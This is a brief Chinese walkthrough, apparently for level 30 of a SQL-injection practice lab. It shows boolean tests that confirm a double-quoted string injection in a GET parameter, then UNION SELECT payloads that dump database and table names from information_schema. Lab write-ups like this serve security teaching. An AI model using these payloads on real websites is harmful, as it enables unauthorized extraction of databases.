第30关使用GET请求传递参数,在url中构造payload即可
后端源码中并没有做什么过滤,只是在参数两边添加了双引号
输入 1" and true-- a,页面正常显示
输入 1" and false-- a,页面空显示
由此可证明存在SQL注入,注入点为双引号字符型注入
页面中有显示位,可以使用联合注入进行脱库
1. -1" union select 1,2, 2. (select group_concat(schema_name) from information_schema.schemata) 3. -- a
脱表
1. -1" union select 1,2, 2. (select group_concat(table_name) from information_schema.tables 3. where table_schema='security') 4. -- a